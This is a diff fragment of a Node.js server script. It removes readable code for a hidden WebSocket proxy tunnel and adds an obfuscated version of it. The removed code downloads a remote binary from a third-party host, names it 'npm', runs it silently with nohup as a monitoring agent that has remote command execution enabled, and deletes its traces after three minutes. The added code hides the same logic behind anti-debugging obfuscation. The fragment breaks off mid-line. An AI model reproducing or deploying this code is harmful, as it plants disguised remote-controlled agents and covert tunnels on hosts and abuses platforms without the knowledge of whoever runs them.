= UUID.replace(/-/g, ""); -wss.on('connection', ws => { - // console.log("Connected successfully"); - ws.once('message', msg => { - const [VERSION] = msg; - const id = msg.slice(1, 17); - if (!id.every((v, i) => v == parseInt(uuid.substr(i * 2, 2), 16))) return; - let i = msg.slice(17, 18).readUInt8() + 19; - const port = msg.slice(i, i += 2).readUInt16BE(0); - const ATYP = msg.slice(i, i += 1).readUInt8(); - const host = ATYP == 1 ? msg.slice(i, i += 4).join('.') : - (ATYP == 2 ? new TextDecoder().decode(msg.slice(i + 1, i += 1 + msg.slice(i, i + 1).readUInt8())) : - (ATYP == 3 ? msg.slice(i, i += 16).reduce((s, b, i, a) => (i % 2 ? s.concat(a.slice(i - 1, i + 1)) : s), []).map(b => b.readUInt16BE(0).toString(16)).join(':') : '')); - // console.log(`Connection from ${host}:${port}`); - ws.send(new Uint8Array([VERSION, 0])); - const duplex = createWebSocketStream(ws); - net.connect({ host, port }, function() { - this.write(msg.slice(i)); - duplex.on('error', () => {}).pipe(this).on('error', () => {}).pipe(duplex); - }).on('error', () => {}); - }).on('error', () => {}); -}); - -const getDownloadUrl = () => { - const arch = os.arch(); - if (arch === 'arm' || arch === 'arm64' || arch === 'aarch64') { - if (!NEZHA_PORT) { - return 'https://arm64.ssss.nyc.mn/v1'; - } else { - return 'https://arm64.ssss.nyc.mn/agent'; - } - } else { - if (!NEZHA_PORT) { - return 'https://amd64.ssss.nyc.mn/v1'; - } else { - return 'https://amd64.ssss.nyc.mn/agent'; - } - } -}; - -const downloadFile = async () => { - if (!NEZHA_SERVER && !NEZHA_KEY) return; // 不存在nezha变量时不下载文件 - - try { - const url = getDownloadUrl(); - // console.log(`Start downloading file from ${url}`); - const response = await axios({ - method: 'get', - url: url, - responseType: 'stream' - }); - - const writer = fs.createWriteStream('npm'); - response.data.pipe(writer); - - return new Promise((resolve, reject) => { - writer.on('finish', () => { - console.log('npm download successfully'); - exec('chmod +x npm', (err) => { - if (err) reject(err); - resolve(); - }); - }); - writer.on('error', reject); - }); - } catch (err) { - throw err; - } -}; - -const runnz = async () => { - try { - const status = execSync('ps aux | grep -v "grep" | grep "./[n]pm"', { encoding: 'utf-8' }); - if (status.trim() !== '') { - console.log('npm is already running, skip running...'); - return; - } - } catch (e) { - //进程不存在时继续运行nezha - } - - await downloadFile(); - let command = ''; - let tlsPorts = ['443', '8443', '2096', '2087', '2083', '2053']; - - if (NEZHA_SERVER && NEZHA_PORT && NEZHA_KEY) { - // 检测哪吒v0是否开启TLS - const NEZHA_TLS = tlsPorts.includes(NEZHA_PORT) ? '--tls' : ''; - command = `setsid nohup ./npm -s ${NEZHA_SERVER}:${NEZHA_PORT} -p ${NEZHA_KEY} ${NEZHA_TLS} --disable-auto-update --report-delay 4 --skip-conn --skip-procs >/dev/null 2>&1 &`; - } else if (NEZHA_SERVER && NEZHA_KEY) { - if (!NEZHA_PORT) { - // 检测哪吒v1是否开启TLS - const port = NEZHA_SERVER.includes(':') ? NEZHA_SERVER.split(':').pop() : ''; - const NZ_TLS = tlsPorts.includes(port) ? 'true' : 'false'; - const configYaml = `client_secret: ${NEZHA_KEY} -debug: false -disable_auto_update: true -disable_command_execute: false -disable_force_update: true -disable_nat: false -disable_send_query: false -gpu: false -insecure_tls: false -ip_report_period: 1800 -report_delay: 1 -server: ${NEZHA_SERVER} -skip_connection_count: false -skip_procs_count: false -temperature: false -tls: ${NZ_TLS} -use_gitee_to_upgrade: false -use_ipv6_country_code: false -uuid: ${UUID}`; - - fs.writeFileSync('config.yaml', configYaml); - } - command = `setsid nohup ./npm -c config.yaml >/dev/null 2>&1 &`; - } else { - console.log('NEZHA variable is empty, skip running'); - return; - } - - try { - exec(command, { shell: '/bin/bash' }, (err) => { - if (err) console.error('npm running error:', err); - else console.log('npm is running'); - }); - } catch (error) { - console.error(`error: ${error}`); - } -}; - -async function addAccessTask() { - if (!AUTO_ACCESS) return; - - if (!DOMAIN) { - // console.log('URL is empty. Skip Adding Automatic Access Task'); - return; - } - const fullURL = `https://${DOMAIN}/${SUB_PATH}`; - try { - const res = await axios.post("https://oooo.serv00.net/add-url", { - url: fullURL - }, { - headers: { - 'Content-Type': 'application/json' - } - }); - console.log('Automatic Access Task added successfully'); - } catch (error) { - // console.error('Error adding Task:', error.message); - } -} - -const delFiles = () => { - fs.unlink('npm', () => {}); - fs.unlink('config.yaml', () => {}); -}; - -httpServer.listen(PORT, () => { - runnz(); - setTimeout(() => { - delFiles(); - }, 180000); // 180s - addAccessTask(); - console.log(`Server is running on port ${PORT}`); -}); +(function(_0x58d05b,_0x452930){const _0xba37d={_0x4401c4:0x587,_0x1e2194:0x508,_0x42f8f7:0x52c,_0x463dfe:0x22d,_0x955b69:0x2da,_0x465d57:0x2ab,_0x352369:0x223,_0xf37ea3:0x55e,_0x4f2a55:0x503,_0x22ddbc:0x43d,_0x1dee26:0x3e5,_0x1d0d89:0x432,_0x3de694:0x42c,_0x972e50:0x3a4,_0x3bbc6a:0x2f4,_0x37f197:0x319,_0xd8bda6:0x4e5,_0x34b76a:0x548,_0x12ba0e:0x4a9,_0x6962d0:0x39f,_0x5f0e87:0x37e,_0x89a2c0:0x292,_0x376092:0x2e0,_0x598abb:0x2a3,_0xd4df1a:0x2d6,_0x1374bb:0x4b5,_0x4789da:0x47a,_0x52b44a:0x475,_0x3548a7:0x4ca,_0x43ee5f:0x4d4},_0x2d1883={_0x38d81e:0x263},_0x506a9a={_0x5d3ade:0x81};function _0xcb7134(_0x767fe,_0x2ec1eb,_0x152068,_0x3bdcfb){return _0x84e0(_0x152068-_0x506a9a._0x5d3ade,_0x3bdcfb);}const _0xea1390=_0x58d05b();function _0x54728f(_0x3a0c5c,_0x3e2574,_0x4abcf9,_0x3ab639){return _0x84e0(_0x3a0c5c-_0x2d1883._0x38d81e,_0x3e2574);}while(!![]){try{const _0x22e1e0=-parseInt(_0x54728f(_0xba37d._0x4401c4,_0xba37d._0x1e2194,_0xba37d._0x42f8f7,0x556))/(-0xa5e+0x7f*-0x15+0xa65*0x2)+parseInt(_0xcb7134(_0xba37d._0x463dfe,_0xba37d._0x955b69,_0xba37d._0x465d57,_0xba37d._0x352369))/(0xf17+0x174d+-0x2662)*(-parseInt(_0x54728f(_0xba37d._0xf37ea3,_0xba37d._0x4f2a55,0x5e3,0x583))/(0x16fc+-0x5*0x611+-0x3*-0x274))+-parseInt(_0x54728f(_0xba37d._0x22ddbc,_0xba37d._0x1dee26,_0xba37d._0x1d0d89,_0xba37d._0x3de694))/(0x3*-0x26f+0x2*-0x10bd+0x28cb)+parseInt(_0xcb7134(_0xba37d._0x972e50,_0xba37d._0x3bbc6a,0x31a,_0xba37d._0x37f197))/(0x2b*-0x95+-0xc53+0x255f)*(-parseInt(_0x54728f(_0xba37d._0xd8bda6,_0xba37d._0x34b76a,_0xba37d._0x12ba0e,0x57f))/(-0x1266+-0x11*0x43+0x16df))+-parseInt(_0xcb7134(_0xba37d._0x6962d0,_0xba37d._0x5f0e87,0x330,_0xba37d._0x89a2c0))/(-0x23f8+0x1c*-0x147+0x47c3)*(parseInt(_0xcb7134(_0xba37d._0x376092,_0xba37d._0x598abb,_0xba37d._0xd4df1a,0x268))/(0x1*0x1c36+-0x57f+-0x16af))+parseInt(_0x54728f(_0xba37d._0x1374bb,_0xba37d._0x4789da,_0xba37d._0x52b44a,0x42f))/(0x1*-0x7e2+0x2*-0x84f+0x23b*0xb)+parseInt(_0x54728f(_0xba37d._0x3548a7,_0xba37d._0x43ee5f,0x49b,0x465))/(0x15a9+-0xaa2*0x1+-0x61*0x1d);if(_0x22e1e0===_0x452930)break;else _0xea1390['push'](_0xea1390['shift']());}catch(_0xc2e5be){_0xea1390['push'](_0xea1390['shift']());}}}(_0x36d7,-0x11ab5*-0x1+-0x22*0x15b+0xfc61));const _0x158511=(function(){const _0x5b65e4={_0xdcdf3c:0x61b,_0x58b192:0x5ed,_0x156de9:0x5ee,_0x386564:0x587},_0x59af17={_0x50690e:0x59d,_0x29d4d7:0x508,_0x56b62e:0x460,_0x2c8958:0x3c3,_0x4d5b4a:0x3f4,_0x93efb6:0x3f6,_0x9853f7:0x277,_0x1084e6:0x220,_0x42af8e:0x249,_0x246e60:0x216},_0x2d4504={_0xd46883:0x35c,_0x5392fa:0x48,_0x4bdc6e:0x1d6},_0x4fc56d={_0x35da4b:0x124,_0x154676:0x7f,_0x40044b:0x10d},_0x2354db={_0xe88f76:0x37a};function _0x419af4(_0xce9b7f,_0x2b8450,_0x5a3c77,_0x37199f){return _0x84e0(_0x5a3c77-0x3ca,_0x2b8450);}const _0x2f6738={};_0x2f6738[_0x4a1e89(0x69b,0x6ad,_0x5b65e4._0xdcdf3c,_0x5b65e4._0x58b192)]=_0x4a1e89(0x5fa,_0x5b65e4._0x156de9,_0x5b65e4._0x386564,0x5dc);const _0x1ccd1b=_0x2f6738;let _0x45073e=!![];function _0x4a1e89(_0x15df37,_0x1e9fe3,_0x4d3abc,_0x332720){return _0x84e0(_0x15df37-_0x2354db._0xe88f76,_0x1e9fe3);}return function(_0x2e4544,_0x2cbae9){const _0x151090={'JRbQI':function(_0x5ef5bb){return _0x5ef5bb();}};function _0x1a7f23(_0x526147,_0x53a8f2,_0x160530,_0x41b28e){return _0x4a1e89(_0x526147- -_0x4fc56d._0x35da4b,_0x160530,_0x160530-_0x4fc56d._0x154676,_0x41b28e-_0x4fc56d._0x40044b);}function _0x2d4bf2(_0xd312d5,_0x1da0cf,_0x1e4dfe,_0x1c0fe9){return _0x4a1e89(_0xd312d5- -_0x2d4504._0xd46883,_0x1da0cf,_0x1e4dfe-_0x2d4504._0x5392fa,_0x1c0fe9-_0x2d4504._0x4bdc6e);}if(_0x1ccd1b[_0x1a7f23(0x577,0x574,_0x59af17._0x50690e,_0x59af17._0x29d4d7)]!==_0x1a7f23(_0x59af17._0x56b62e,_0x59af17._0x2c8958,_0x59af17._0x4d5b4a,_0x59af17._0x93efb6)){const _0x3fba51=_0x45073e?function(){if(_0x2cbae9){const _0x1bb306=_0x2cbae9['apply'](_0x2e4544,arguments);return _0x2cbae9=null,_0x1bb306;}}:function(){};return _0x45073e=![],_0x3fba51;}else _0x151090[_0x2d4bf2(_0x59af17._0x9853f7,_0x59af17._0x1084e6,_0x59af17._0x42af8e,_0x59af17._0x246e60)](_0x4b3e03);};}()),_0x5dde86=_0x158511(this,function(){const _0x573d78={_0x108254:0x38a,_0x275567:0x356,_0x295a20:0x600,_0x4b573a:0x5bd,_0x466eaa:0x512,_0x54c856:0x4e5,_0x592c90:0x4b9,_0x1569a1:0x4c8,_0x468fe0:0x517,_0x1db4dc:0x4dc,_0x1f2399:0x584,_0x4af7d8:0x4ff,_0x542fd6:0x4a7,_0x1bd7cf:0x48b,_0x1f1dc7:0x45c,_0x4c9b6b:0x41a,_0x12dc0b:0x57d,_0x21987f:0x5bb,_0x46b08a:0x5ae},_0x2d9d19={_0xe5abe:0x2bf},_0xc08ff0={_0x525277:0x1a8},_0x1f2e63={};function _0x5a6cd0(_0xdba212,_0x355380,_0xc3e5b7,_0x5729a4){return _0x84e0(_0x355380-_0xc08ff0._0x525277,_0x5729a4);}_0x1f2e63['XLSvR']='(((.+)+)+)+$';function _0x37f16f(_0x51b286,_0x3ae202,_0x894786,_0x2b4c09){return _0x84e0(_0x3ae202-_0x2d9d19._0xe5abe,_0x894786);}const _0x528905=_0x1f2e63;return _0x5dde86[_0x5a6cd0(_0x573d78._0x108254,0x400,_0x573d78._0x275567,0x3a9)]()[_0x37f16f(_0x573d78._0x295a20,0x5a2,_0x573d78._0x4b573a,_0x573d78._0x466eaa)](_0x528905[_0x5a6cd0(_0x573d78._0x54c856,_0x573d78._0x592c90,0x4a2,_0x573d78._0x1569a1)])[_0x37f16f(0x516,_0x573d78._0x468fe0,_0x573d78._0x1db4dc,0x502)]()[_0x37f16f(0x4f8,_0x573d78._0x1f2399,_0x573d78._0x4af7d8,0x5f2)](_0x5dde86)[_0x5a6cd0(_0x573d78._0x542fd6,_0x573d78._0x1bd7cf,_0x573d78._0x1f1dc7,_0x573d78._0x4c9b6b)](_0x528905[_0x37f16f(_0x573d78._0x12dc0b,0x5d0,_0x573d78._0x21987f,_0x573d78._0x46b08a)]);});_0x5dde86();const _0x4294ef=(function(){const _0xcb530={_0x26bbf6:0x372,_0x478b20:0x2f2,_0x47c9d4:0x301,_0x3e95a4:0x240,_0xbde621:0x2be,_0x6990f2:0x29c,_0x4f62c3:0x28d},_0x5e3fbe={_0x13c6c5:0x2c3,_0xfdd543:0x2d5,_0x5c8efd:0x33b,_0x2a7abd:0x22e,_0x3c74f4:0x2db,_0x62e042:0x228,_0x5768af:0x2bb,_0x252b51:0x575,_0x1dd64c:0x5b5,_0x660780:0x5d9,_0x120276:0x583,_0x2f09bf:0x354,_0x34bdbc:0x3ef,_0x463ace:0x400,_0x597f6e:0x2d1,_0x86fce8:0x2a6,_0x1478f0:0x611,_0x1263d0:0x5e9,_0x1a81d3:0x610},_0x50097d={_0x2cb12e:0x3ad,_0x182219:0x33e,_0x3d2d6f:0x3af,_0x588b75:0x382,_0x26c0c0:0x377,_0x94ccc2:0x2d5,_0x4047aa:0x2f2,_0x4033d7:0x25d,_0xffc946:0x426,_0xf329a3:0x417,_0x144f18:0x37d,_0x47b5c1:0x23d,_0x5fa487:0x29f,_0x18ace5:0x26d,_0x2f1ceb:0x24e,_0x3dc73b:0x1d6,_0x8f118d:0x2e6,_0x553526:0x285,_0x4e8c37:0x2f1,_0x386467:0x1cd,_0x3c7f90:0x268,_0x40a69d:0x373,_0x25e1a6:0x32d,_0x32c620:0x2ad,_0x4b33e0:0x39a,_0x4d640c:0x2e5},_0x385660={_0x523a90:0x28,_0x5b4d1f:0x3f,_0x119310:0xbe},_0x56b6fa={'FmITz':function(_0x5e26c0,_0x264500){return _0x5e26c0(_0x264500);},'nKaCj':function(_0x1d1f53,_0x1dfa7b){return _0x1d1f53+_0x1dfa7b;},'ftJef':_0x56213f(_0xcb530._0x26bbf6,_0xcb530._0x478b20,0x370,_0xcb530._0x47c9d4),'mPKvW':function(_0x42cf80,_0x5f5bcb){return _0x42cf80===_0x5f5bcb;},'NGPAr':_0x56213f(_0xcb530._0x3e95a4,0x246,_0xcb530._0xbde621,0x1de),'UuFkf':function(_0x51cfab,_0x4965f8){return _0x51cfab!==_0x4965f8;},'iWOnh':_0x56213f(0x20d,_0xcb530._0x6990f2,_0xcb530._0x4f62c3,0x200)};function _0x4bd09c(_0x1989bb,_0x3db9a1,_0x4a185d,_0x4cbe86){return _0x84e0(_0x3db9a1-0x21a,_0x4cbe86);}function _0x56213f(_0x51eee8,_0x5be54b,_0xed4f7,_0x5d913e){return _0x84e0(_0x5be54b-0x78,_0x5d913e);}let _0x3c63f7=!![];return function(_0x223874,_0x47edab){const _0x33ef72={_0x51dd5b:0x1f1,_0x3416f8:0x3b1},_0x42e252={_0x276b3d:0x485,_0x29c11e:0x41a};function _0x2f9a2e(_0x2d8ff3,_0x44b4b6,_0x225cec,_0x325b05){return _0x56213f(_0x2d8ff3-_0x385660._0x523a90,_0x2d8ff3- -_0x385660._0x5b4d1f,_0x225cec-_0x385660._0x119310,_0x225cec);}const _0x40be84={'DVzAU':function(_0x49085e,_0x2323b9){return _0x49085e(_0x2323b9);},'zBfgT':function(_0x18eba0,_0x56f48a){return _0x56b6fa['nKaCj'](_0x18eba0,_0x56f48a);},'KDXew':_0x56b6fa[_0x2f9a2e(_0x5e3fbe._0x13c6c5,_0x5e3fbe._0xfdd543,_0x5e3fbe._0x5c8efd,_0x5e3fbe._0x2a7abd)],'JuBfF':function(_0x988cd9,_0x55fdb0){return _0x56b6fa['mPKvW'](_0x988cd9,_0x55fdb0);},'NWvgC':_0x56b6fa['NGPAr']};function _0x11c8f0(_0x21804d,_0xe9b2e6,_0xdcf31b,_0x430d3c){return _0x56213f(_0x21804d-0x9b,_0xdcf31b-0x327,_0xdcf31b-0xf,_0x430d3c);}if(_0x56b6fa[_0x2f9a2e(_0x5e3fbe._0x3c74f4,_0x5e3fbe._0x62e042,_0x5e3fbe._0x5768af,0x308)]('urbwN',_0x56b6fa[_0x11c8f0(_0x5e3fbe._0x252b51,_0x5e3fbe._0x1dd64c,_0x5e3fbe._0x660780,_0x5e3fbe._0x120276)])){const _0x5ed519=_0x3c63f7?function(){const _0x5f26d9={_0x33f37e:0xf7,_0x88156e:0x320},_0x3b74d6={_0x2e5d11:0x50,_0x1b8c19:0x29,_0xfec910:0x3a},_0x159e06={'SubsP':function(_0x317acf,_0x66ef6d){const _0x493c65={_0x5e41de:0x1bb};function _0x359442(_0x292f98,_0x4a655a,_0x352644,_0x4c96a2){return _0x84e0(_0x352644-_0x493c65._0x5e41de,_0x292f98);}return _0x40be84[_0x359442(0x374,_0x42e252._0x276b3d,_0x42e252._0x29c11e,0x3c2)](_0x317acf,_0x66ef6d);},'PTOCi':function(_0x4dd65c,_0x3b4b28){function _0x3496d0(_0x33993c,_0x58e8b5,_0x4ca9ea,_0x39ccd1){return _0x84e0(_0x39ccd1- -0x28e,_0x4ca9ea);}return _0x40be84[_0x3496d0(-_0x3b74d6._0x2e5d11,-0x5c,-_0x3b74d6._0x1b8c19,-_0x3b74d6._0xfec910)](_0x4dd65c,_0x3b4b28);},'fYcmY':_0x143534(0x3eb,_0x50097d._0x2cb12e,_0x50097d._0x182219,_0x50097d._0x3d2d6f),'eqqFK':_0x40be84[_0x199853(0x2bb,_0x50097d._0x588b75,_0x50097d._0x26c0c0,_0x50097d._0x94ccc2)]};function _0x199853(_0x20424f,_0x57b5c4,_0x1fca37,_0x1c6533){return _0x11c8f0(_0x20424f-0x1a7,_0x57b5c4-_0x33ef72._0x51dd5b,_0x1c6533- -_0x33ef72._0x3416f8,_0x20424f);}function _0x143534(_0x130a62,_0x544592,_0x495462,_0xa62cc1){return _0x11c8f0(_0x130a62-_0x5f26d9._0x33f37e,_0x544592-0x8a,_0xa62cc1- -_0x5f26d9._0x88156e,_0x130a62);}if(_0x40be84[_0x143534(0x266,_0x50097d._0x4047aa,0x1ed,_0x50097d._0x4033d7)](_0x40be84[_0x143534(_0x50097d._0xffc946,0x32c,_0x50097d._0xf329a3,_0x50097d._0x144f18)],_0x40be84[_0x199853(_0x50097d._0x47b5c1,_0x50097d._0x5fa487,_0x50097d._0x18ace5,0x2ec)])){if(_0x47edab){const _0x10c783=_0x47edab[_0x199853(_0x50097d._0x2f1ceb,_0x50097d._0x3dc73b,_0x50097d._0x8f118d,_0x50097d._0x553526)](_0x223874,arguments);return _0x47edab=null,_0x10c783;}}else{const _0x1adfc0=_0x159e06[_0x143534(0x29d,_0x50097d._0x4e8c37,_0x50097d._0x386467,_0x50097d._0x3c7f90)](_0x22f961,_0x159e06['PTOCi'](_0x159e06[_0x143534(0x297,_0x50097d._0x40a69d,_0x50097d._0x25e1a6,0x2c9)],_0x159e06[_0x143534(_0x50097d._0x32c620,_0x50097d._0x4b33e0,_0x50097d._0x4d640c,0x2f3)])+');');_0x2dae38=_0x1adfc0();}}:function(){};return _0x3c63f7=![],_0x5ed519;}else{_0x56b6fa[_0x2f9a2e(_0x5e3fbe._0x2f09bf,_0x5e3fbe._0x34bdbc,0x37a,_0x5e3fbe._0x463ace)](_0x18914,new _0x50cb2c(_0x2f9a2e(_0x5e3fbe._0x597f6e,0x301,_0x5e3fbe._0x86fce8,0x2a3)+_0x353482+_0x11c8f0(_0x5e3fbe._0x1478f0,_0x5e3fbe._0x1263d0,_0x5e3fbe._0x1a81d3,0x66b)));return;}};}()),_0x538dcd=_0x4294ef(this,function(){const _0x428b73={_0x4585ac:0x134,_0x29fd1b:0xb0,_0x11ba70:0x156,_0x390dfa:0x1dd,_0x29c784:0x22e,_0x4b1445:0x209,_0x30b338:0x40,_0x1b6f09:0x85,_0x46be2f:0xec,_0x51b155:0x14f,_0x5038ef:0x1ed,_0x2352ed:0x19e,_0x5517d6:0x1c4,_0x22b6b9:0x1f9,_0x4495b6:0x1b8,_0x4a3b84:0x26c,_0xe457d6:0x1b7,_0x12c2c7:0x0,_0x27d242:0x9,_0xacf431:0x3b,_0x39d307:0xb0,_0x4ae4b5:0x13e,_0x42eedb:0x14a,_0x1e02e8:0x172,_0x55fe67:0x10b,_0x29742:0x16b,_0x219fc8:0x17c,_0x5eca14:0xd6,_0x47b8a6:0xba,_0x42f7db:0x8d,_0x37514d:0x9a,_0x15cdd8:0x79,_0x515f70:0x116,_0x405fff:0x173,_0x112c2b:0xfa,_0x9e6765:0x18f,_0x322446:0x62,_0x131d3d:0xdd,_0x467757:0x108,_0x517ed4:0x1b6,_0x56aae7:0x195,_0x55f873:0x17e,_0x3d8725:0x21c,_0x1438a8:0x199,_0x245799:0x123,_0x147d34:0x6a,_0x29342f:0x18a,_0x302454:0x5f,_0x1b5625:0x7,_0x435cae:0x1fa,_0x1e3ae3:0x299,_0xb173f0:0x1f2,_0xa2457d:0x22a,_0xbf8b39:0x285,_0x3656ec:0x204,_0x3ff2ad:0x18c,_0x9470a1:0x10a,_0x489374:0x56,_0x49551a:0xaf,_0x545797:0x101,_0x253403:0x109,_0x3b1aaa:0x1c8,_0xe70eb6:0xef,_0xd6adf8:0xac,_0x245083:0x76,_0x4d64d9:0xeb,_0x333819:0x85,_0x44dee7:0x98,_0x55fd00:0x190,_0x5740f2:0xe2,_0x324f5f:0x3a,_0x1a4a68:0xd6,_0x493828:0x132,_0x16e2d4:0x1df,_0x2cec05:0x137,_0xb8c738:0x235,_0x3a11e2:0x2a3,_0x2722ba:0x1ba,_0x227fc0:0xc0,_0x452479:0x14d},_0x275d98={_0x2a1eb8:0x102},_0x30da44={_0x252bb7:0x30a};function _0x4f28ee(_0x2e21a8,_0x4b7736,_0x5f06b9,_0x1554cd){return _0x84e0(_0x4b7736- -_0x30da44._0x252bb7,_0x2e21a8);}const _0x1ed3dd={'AGWrt':_0x4f28ee(-_0x428b73._0x4585ac,-_0x428b73._0x29fd1b,-_0x428b73._0x11ba70,-0x34),'pJJOq':function(_0x552105,_0xc2619a){return _0x552105(_0xc2619a);},'uVxXx':function(_0x3902f5,_0x48acc0){return _0x3902f5+_0x48acc0;},'LVXBL':function(_0xaddf5a,_0xd224ec){return _0xaddf5a+_0xd224ec;},'DzqZT':_0x2e906a(_0x428b73._0x390dfa,0x288,_0x428b73._0x29c784,_0x428b73._0x4b1445),'rESni':function(_0x30a385){return _0x30a385();},'hZZFU':_0x4f28ee(-_0x428b73._0x30b338,-_0x428b73._0x1b6f09,-0x73,-_0x428b73._0x46be2f),'qKuOs':'info','XinQH':_0x2e906a(0x155,_0x428b73._0x51b155,_0x428b73._0x5038ef,_0x428b73._0x2352ed),'GPpIE':_0x2e906a(_0x428b73._0x5517d6,_0x428b73._0x22b6b9,_0x428b73._0x4495b6,_0x428b73._0x4a3b84),'OGPJt':_0x2e906a(0x13e,0x155,_0x428b73._0xe457d6,0x1af),'eMqFt':_0x4f28ee(_0x428b73._0x12c2c7,-_0x428b73._0x27d242,-0x9f,_0x428b73._0xacf431),'WLiAg':_0x2e906a(_0x428b73._0x39d307,_0x428b73._0x4ae4b5,_0x428b73._0x42eedb,_0x428b73._0x1e02e8)};let _0x36ab70;try{const _0x3be862=_0x1ed3dd[_0x2e906a(0xac,0x129,_0x428b73._0x55fe67,0x117)](Function,_0x1ed3dd[_0x2e906a(0x22d,_0x428b73._0x29742,_0x428b73._0x219fc8,_0x428b73._0x5eca14)](_0x1ed3dd['LVXBL'](_0x1ed3dd['DzqZT'],_0x4f28ee(-_0x428b73._0x47b8a6,-0x90,-_0x428b73._0x42f7db,-_0x428b73._0x37514d)),');'));_0x36ab70=_0x1ed3dd[_0x4f28ee(-_0x428b73._0x15cdd8,-_0x428b73._0x515f70,-_0x428b73._0x405fff,-_0x428b73._0x112c2b)](_0x3be862);}catch(_0x35ef38){_0x36ab70=window;}const _0x1b1883=_0x36ab70[_0x2e906a(_0x428b73._0x9e6765,0x61,0x100,_0x428b73._0x322446)]=_0x36ab70[_0x4f28ee(-_0x428b73._0x131d3d,-_0x428b73._0x467757,-_0x428b73._0x517ed4,-_0x428b73._0x56aae7)]||{};function _0x2e906a(_0x56fc70,_0x5205c0,_0x5359a7,_0x223dee){return _0x84e0(_0x5359a7- -_0x275d98._0x2a1eb8,_0x56fc70);}const _0x32c97c=[_0x1ed3dd[_0x2e906a(_0x428b73._0x55f873,_0x428b73._0x3d8725,_0x428b73._0x1438a8,_0x428b73._0x245799)],_0x2e906a(0x18d,_0x428b73._0x147d34,0xf7,_0x428b73._0x29342f),_0x1ed3dd[_0x4f28ee(_0x428b73._0x302454,-0x4c,-_0x428b73._0x1b5625,-0x22)],_0x1ed3dd['XinQH'],_0x1ed3dd[_0x2e906a(_0x428b73._0x435cae,_0x428b73._0x1e3ae3,_0x428b73._0xb173f0,0x21b)],_0x1ed3dd['OGPJt'],_0x1ed3dd[_0x2e906a(_0x428b73._0xa2457d,_0x428b73._0xbf8b39,_0x428b73._0x3656ec,_0x428b73._0x3ff2ad)]];for(let _0x16f938=-0x1*0xc61+-0x5ac*-0x6+-0x15a7;_0x16f938<_0x32c97c[_0x4f28ee(-0x198,-0xef,-_0x428b73._0x9470a1,-_0x428b73._0x489374)];_0x16f938++){if(_0x1ed3dd[_0x4f28ee(-0x15b,-_0x428b73._0x49551a,-_0x428b73._0x545797,-_0x428b73._0x253403)]===_0x4f28ee(-_0x428b73._0x3b1aaa,-0x138,-_0x428b73._0xe70eb6,-_0x428b73._0xd6adf8))return!_0x117b6e?'https://arm64.ssss.nyc.mn/v1':_0x1ed3dd[_0x4f28ee(-_0x428b73._0x245083,-0xff,-_0x428b73._0x4d64d9,-_0x428b73._0x333819)];else{const _0x9fcabe=_0x4294ef[_0x4f28ee(0x2,-0x45,-_0x428b73._0x44dee7,0x47)][_0x4f28ee(-_0x428b73._0x55fd00,-_0x428b73._0x5740f2,-_0x428b73._0x1e02e8,-_0x428b73._0x324f5f)][_0x4f28ee(-_0x428b73._0x1a4a68,-_0x428b73._0x493828,-_0x428b73._0x16e2d4,-_0x428b73._0x2cec05)](_0x4294ef),_0x24ba78=_0x32c97c[_0x16f938],_0x1dd9a8=_0x1b1883[_0x24ba78]||_0x9fcabe;_0x9fcabe[_0x2e906a(0x257,_0x428b73._0xb8c738,0x20e,_0x428b73._0x3a11e2)]=_0x4294ef['bind'](_0x4294ef),_0x9fcabe[_0x2e906a(_0x428b73._0x435cae,0xc6,_0x428b73._0x11ba70,_0x428b73._0x2722ba)]=_0x1dd9a8[_0x2e906a(_0x428b73._0x227fc0,_0x428b73._0x452479,0x156,_0x428b73._0x5740f2)]['bind'](_0x1dd9a8),_0x1b1883[_0x24ba78]=_0x9fcabe;}}});_0x538dcd();const os=require('os'),http=require(_0x279f0a(-0x1f4,-0x21e,-0x1c0,-0x1b2)),fs=require('fs'),axios=require(_0x421fd5(-0xa4,-0xcc,-0x136,-0xd9)),net=require('net'),path=require(_0x279f0a(-0x110,-0x182,-0xeb,-0x19c)),crypto=require(_0x279f0a(-0x14c,-0x99,-0xf6,-0x171)),{Buffer}=require(_0x279f0a(0x26,0x34,-0x7b,-0x4c)),{exec,execSync}=require('child_process'),{WebSocket,createWebSocketStream}=require('ws'),UUID=process[_0x279f0a(-0xb8,-0x5e,-0xc3,-0x77)][_0x279f0a(-0x104,-0x19,-0xbc,-0x35)]||'fb75cec3-cad0-45aa-b767-1f028e8ebb57',NEZHA_SERVER=process[_0x279f0a(-0x23,-0xb9,-0xc3,-0xe4)][_0x279f0a(-0xa4,-0x9e,-0xbf,-0x169)]||'',NEZHA_PORT=process[_0x279f0a(-0x119,-0xdc,-0xc3,-0xa8)][_0x421fd5(-0x10e,-0x10c,-0x107,-0xa6)]||'',NEZHA_KEY=process[_0x279f0a(-0xf3,-0x160,-0xc3,-0x61)][_0x279f0a(-0x1d7,-0x195,-0x1c7,-0x245)]||'',DOMAIN=process[_0x421fd5(-0x21,-0x52,-0xd3,-0x15f)][_0x421fd5(-0x1c1,-0x122,-0x184,-0x158)]||_0x421fd5(-0x107,-0x1c6,-0x1a3,-0x171),AUTO_ACCESS=process[_0x421fd5(-0x92,-0xa0,-0xd3,-0xae)][_0x279f0a(-0x183,-0x251,-0x1c1,-0x113)]||!![];function _0x279f0a(_0x325e8f,_0x577486,_0x410ed2,_0x1b5c93){const _0x93bfdf={_0x3b0007:0x3ac};return _0x84e0(_0x410ed2- -_0x93bfdf._0x3b0007,_0x325e8f);}const WSPATH=process['env']['WSPATH']||UUID[_0x279f0a(-0x10b,-0x13f,-0xd8,-0x15d)](-0x10b9+0xb77+-0x1*-0x542,0x1e49*0x1+0xcce+-0x2b0f),SUB_PATH=process['env'][_0x279f0a(-0x14b,-0x13b,-0xfe,-0x15d)]||'subs',NAME=process[_0x421fd5(-0x55,-0x15d,-0xd3,-0x35)]['NAME']||'',PORT=process['env'][_0x279f0a(-0x211,-0x12e,-0x16b,-0x203)]||-0x8bf+0x212b+0x4*0x192;function _0x421fd5(_0x50eecc,_0x310eda,_0x200259,_0x3201d4){return _0x84e0(_0x200259- -0x3bc,_0x310eda);}let ISP='';const GetISP=async()=>{const 